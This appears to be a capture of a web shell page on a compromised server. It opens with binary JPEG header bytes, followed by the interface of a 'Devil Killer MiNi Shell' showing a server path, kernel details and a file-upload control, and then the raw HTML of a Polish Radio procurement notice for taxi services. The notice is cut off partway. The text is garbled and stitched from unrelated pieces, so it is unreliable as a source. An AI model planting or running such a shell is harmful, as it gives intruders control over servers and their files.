JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221116/0044243501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług transportowych w zakresie przewozu osób taksówkami </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Polskie Radio - Spółka Akcyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010420591</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 77/85</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-977</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">226453303</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@polskieradio.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.prsa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> produkcja programów wraz z ich nadawaniem </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług transportowych w zakresie przewozu osób taksówkami </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-145d5b5b-65b2-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00442435</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://polskieradio.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platforma Przetargowa Polskiego Radia S.A. dostępna pod adresem:<br/>https://polskieradio.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">I. Wymagania techniczno – sprzętowe umożliwiające pracę na Platformie<br/>1. Stały dostęp do sieci Internet o gwarantowanej przepustowości (prędkość łącza internetowego) powyżej 500Kb/s.<br/>2. Dopuszczalne przeglądarki internetowe:<br/> Internet Explorer 10 i nowsze, Edge,<br/> Google Chrome,<br/> Mozilla Firefox,<br/> Opera,<br/>- obsługujące protokół: XMLHttpRequest – ajax.<br/>3. Dysponowanie sprzętem komputerowym, na którym możliwa jest praca na przeglądarkach wymienionych w pkt 2.<br/>4. Zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>5. Włączona obsługa JavaScript.<br/>6. Zainstalowany program Acrobat Reader.<br/>II. Informacje dotyczące dopuszczalnych formatów przesyłanych danych, formatów kwalifikowanego podpisu elektronicznego, podpisu zaufanego i podpisu osobistego oraz kodowania i czasu odbioru danych<br/>1. Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych określonych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452).<br/>2. Format przesyłanych danych:<br/>1) wielkość pojedynczego pliku do 50 MB, w przypadku przekazywania plików o większej objętości zalecana jest kompresja danych, albo podział pliku na mniejsze,<br/>2) zalecany format: .pdf, przy czym Zamawiający dopuszcza inne formaty danych, wymienione w Załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2016 r. poz. 113 z późn. zm.), np.: .doc, .docs, .rtf, .xps, .odt, przy czym wybór formatu nie może prowadzić do naruszenia zasad uczciwej konkurencji i równego traktowania wykonawców jednocześnie musi umożliwiać użycie kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego.<br/>3. Format kwalifikowanego podpisu elektronicznego, podpisu zaufanego i podpisu osobistego:<br/>1) dokumenty, oświadczenia w formacie .pdf należy podpisywać formatem PAdES<br/>2) dokumenty, oświadczenia składane w formatach innych niż .pdf należy podpisywać formatem XAdES.<br/>4. Kodowanie i czas odbioru danych:<br/>1) plik z ofertą, z dokumentami lub oświadczeniami składającymi się na ofertę, w tym z oświadczeniem o którym mowa w art. 125 ust. 1 ustawy złożone (załączone) na Platformie, są automatycznie szyfrowane przez system, który jednocześnie blokuje automatycznie dostęp do tych plików. Możliwość otworzenia plików dostępna jest dopiero po odszyfrowaniu przezZamawiającego (odszyfrowanie następują poprzez wpisanie przez Zamawiającego kodu autoryzacji) po upływie terminu składania ofert,<br/>2) czas odbioru danych oznaczany jest według czasu systemowego widniejącego w prawym górnym rogu strony Platformy zapisany: „data dzienna”, hh:mm:ss + 01:00 (CET),<br/>3) czas odbioru danych w postaci oferty, dokumentów składających się na ofertę znajduje się w kolumnie „Data złożenia oferty” i jest zapisany jako: „rok-miesiąc-dzień; hh:mm:ss”,<br/>4) czas odbioru danych innych niż wskazane powyżej w pkt II.3.1) znajduje się po prawej stronie przekazywanych dokumentów i jest zapisany jako: „rok-miesiąc-dzień; hh:mm:ss”.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://polskieradio.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Treść klauzuli informacyjnej została zawarta w pkt II SWZ (plik SWZ - cz. ogólna)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Treść klauzuli informacyjnej została zawarta w pkt II SWZ (plik SWZ - cz. ogólna)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.B5.27.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług transportowych w zakresie przewozu osób taksówkami.<br/>2. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SWZ. Pozostałe warunki wykonania zamówienia<br/>zawierają projektowane postanowienia umowy stanowiące Załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60120000-5 - Usługi taxi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni złożone oferty oraz dokona wyboru oferty najkorzystniejszej w oparciu o poniższe kryterium i jego wagę, przy czym 1% = 1 pkt:<br/><br/>1)	„C1 – cena za jeden kilometr w pierwszej taryfie z uwzględnieniem rabatu określonego w kolumnie 4 Formularza ofertowego” – waga 30% - maksymalna liczba punktów, którą może uzyskać oferta w tym kryterium to 30,00 pkt. <br/>W tym kryterium zostanie zastosowany wzór: <br/><br/>C1 = (C1min / C1b) x 30 <br/><br/>gdzie, <br/>C1 – ilość punktów uzyskanych przez ofertę w kryterium cena za jeden kilometr w pierwszej taryfie, <br/>C1min – cena najniższa spośród badanych ofert w pierwszej taryfie, <br/>C1b – cena badanej oferty w pierwszej taryfie.<br/><br/>2)	„C2 – cena za jeden kilometr w drugiej taryfie z uwzględnieniem rabatu określonego w kolumnie 4 Formularza ofertowego” – waga 20% - maksymalna liczba punktów, którą może uzyskać oferta w tym kryterium to 20,00 pkt. <br/>W tym kryterium zostanie zastosowany wzór:<br/> <br/>C2 = (C2min / C2b) x 20 <br/>gdzie, <br/>C2 – ilość punktów uzyskanych przez ofertę w kryterium cena za jeden kilometr w drugiej taryfie, <br/>C2min – cena najniższa spośród badanych ofert w drugiej taryfie, <br/>C2b – cena badanej oferty w drugiej taryfie.<br/><br/>3)	„C3 – cena za jeden kilometr w trzeciej taryfie z uwzględnieniem rabatu określonego w kolumnie 4 Formularza ofertowego” – waga 15% - maksymalna liczba punktów, którą może uzyskać oferta w tym kryterium to 15,00 pkt. <br/>W tym kryterium zostanie zastosowany wzór:<br/><br/>C3 = (C3min / C3b) x 15 <br/>gdzie, <br/>C3 – ilość punktów uzyskanych przez ofertę w kryterium cena za jeden kilometr w trzeciej taryfie, <br/>C3min – cena najniższa spośród badanych ofert w trzeciej taryfie, <br/>C3b – cena badanej oferty w trzeciej taryfie.<br/><br/>4)	„C4 – cena za jeden kilometr w czwartej taryfie z uwzględnieniem rabatu określonego w kolumnie 4 Formularza ofertowego” – waga 15% - maksymalna liczba punktów, którą może uzyskać oferta w tym kryterium to 15,00 pkt. <br/>W tym kryterium zostanie zastosowany wzór:<br/> <br/>C4 = (C4min / C4b) x 15 <br/>gdzie, <br/>C4 – ilość punktów uzyskanych przez ofertę w kryterium cena za jeden kilometr w czwartej taryfie, <br/>C4min – cena najniższa spośród badanych ofert w czwartej taryfie, <br/>C4b – cena badanej oferty w czwartej taryfie.<br/><br/>5)	„T – ilość taksówek” – waga 10% - w kryterium tym punktu przyznawane będą za każdą liczbę pojazdów (taksówek) przekraczającą minimum wymagane w opisie przedmiotu zamówienia (Załącznik nr 1 do SWZ). Maksymalna liczba punktów, którą może uzyskać oferta w tym kryterium to 10,00 pkt. <br/>W tym kryterium zostanie zastosowany wzór: <br/><br/>T = (Tb / Tn) x 10 <br/>gdzie, <br/>T – ilość punktów uzyskanych przez ofertę w kryterium ilość taksówek, <br/>Tb – ilość taksówek oferty badanej, <br/>Tn – najwyższa ilość taksówek spośród badanych ofert.<br/><br/>UWAGA: W przypadku wskazania minimalnej floty 250 pojazdów punkty nie będą przyznawane. <br/><br/>6)	„Op – opłata początkowa” – waga 10% - maksymalna liczba punktów, którą może uzyskać oferta w tym kryterium to 10,00 pkt. <br/>W tym kryterium zostanie zastosowany wzór:<br/> <br/>Op = (Opmin / Opb) x 10 <br/>gdzie, <br/>Op – ilość punktów uzyskanych przez ofertę w kryterium opłata początkowa, <br/>Opmin – najniższa opłata początkowa spośród badanych ofert, <br/>Opb – wysokość opłaty początkowej badanej oferty.<br/><br/>Ilość punktów uzyskana przez ofertę będzie liczona zgodnie ze wzorem: <br/>C1 + C2 + C3 + C4 + T + Op</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">C2 – cena za jeden kilometr w drugiej taryfie z uwzględnieniem rabatu określonego w kolumnie 4 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">C3 – cena za jeden kilometr w trzeciej taryfie z uwzględnieniem rabatu określonego w kolumnie 4 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">C4 – cena za jeden kilometr w czwartej taryfie z uwzględnieniem rabatu określonego w kolumnie 4 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">T – ilość taksówek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Op – opłata początkowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Przed wyborem oferty<br/>najkorzystniejszej, Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w terminie nie krótszym<br/>niż 5 dni, aktualnego na dzień złożenia oświadczenia wykonawcy, w zakresie określonym w pkt VIII.1.5) [w art. 108 ust. 1 pkt 5)<br/>ustawy pzp], o braku przynależności z innym wykonawcą, który złożył ofertę w niniejszym postępowaniu do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, a w przypadku zaistnienia ww.<br/>okoliczności – oświadczenia o przynależności z innym wykonawcą, który złożył ofertę w niniejszym postępowaniu do tej samej grupy<br/>kapitałowej i dokumentów lub informacji potwierdzających przygotowanie oferty niezależnie od ww. innego wykonawcy. Wzór<br/>oświadczeń zawiera Załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>Składając ofertę, poza oświadczeniem, o braku podstaw do wykluczenia, wykonawcy zobowiązani są przedłożyć:<br/>1) wypełniony Formularz oferty – wg wzoru stanowiącego Załącznik nr 2 do SWZ,<br/>2) pełnomocnictwo– w przypadku, gdy:<br/>a) wykonawca ustanawia pełnomocnika (pełnomocników) do reprezentowania go w postępowaniu albo do reprezentowania i<br/>zawarcia umowy w sprawie zamówienia publicznego;<br/>b) ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>W pełnomocnictwie należy określić zakres umocowania. Pełnomocnictwo musi być podpisane przez osoby uprawnione do<br/>reprezentacji mocodawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. W celu wykazania podstaw do wykluczenia, wskazanych w pkt VIII.1 wraz z oferta, każdy z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, zgodnie z pkt X.1, załącza do oferty wspólnej oświadczenie o niepodleganiu<br/>wykluczeniu, sporządzone zgodnie z Załącznikiem nr 3 do SWZ i wytycznymi zawartymi w pkt X.1 oraz złożone zgodnie z<br/>wytycznymi zawartymi w Załączniku nr 6 do SWZ.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wraz z ofertą składają dokumenty wymienione w pkt X.2 –<br/>w zakresie i sytuacjach tam określonych.<br/>4. W przypadku, gdy najwyżej ocenioną będzie oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>przed wyborem tej oferty Zamawiający w terminie wskazanym w pkt X.3, wezwie wykonawców do złożenia przez każdego z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia wymienionego w pkt X.3.<br/>Postanowienia pkt X.4 – X.6 mają zastosowanie.<br/>5. Do wykonawców wspólnie ubiegających się o udzielenie zamówienia zastosowanie mają odpowiednie przepisy ustawy<br/>oraz postanowienia SWZ dotyczące wykonawców.<br/>6. Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana Umowy może nastąpić za zgodą Stron wyrażoną na piśmie pod rygorem nieważności. <br/>2.	Zamawiający dopuszcza możliwość dokonania zmian Umowy w stosunku do treści oferty <br/>w następujących przypadkach i zakresie: <br/>1)	gdy Zamawiający w terminie 24 miesięcy nie wykorzysta kwoty, o której mowa w § 3 ust. 1 Na realizację przedmiotu Umowy poprzez wydłużenie terminu obowiązywania Umowy, jednak nie dłużej niż o kolejne 12 miesięcy;<br/>2)	w zakresie wysokości opłaty początkowej oraz wartości netto i cen za 1 kilometr w poszczególnych taryfach podanych w Załączniku nr 2 do Umowy – w przypadku, gdy zmiana cen urzędowych za korzystanie z taksówek osobowych w m. st. Warszawa ustalonych przez Radę Miasta Stołecznego Warszawy, jako cen maksymalnych, skutkować będzie zmianą obowiązującego u Wykonawcy cennika opłat według wskazań taksometru, z zastrzeżeniem, że zmiana wysokości opłaty początkowej oraz wartość netto i cen za 1 kilometr w poszczególnych taryfach nie może przekroczyć 50% pierwotnej ich wysokości i pod warunkiem, że na co najmniej 30 dni przed wprowadzeniem zmian Wykonawca powiadomi o tym fakcie Zamawiającego oraz uzasadni w jaki sposób zmiana cen urzędowych wpłynęła na jego cennik,<br/>3)	w zakresie wysokości udzielnego rabatu wskazanego w Załączniku nr 2 do Umowy – Zamawiający wymaga dostosowania wysokości rabatu wskazanego w Złączniku nr 2 do Umowy, gdy zmiana obowiązującego u Wykonawcy cennika opłat według wskazań taksometru, skutkująca zmianą opłaty 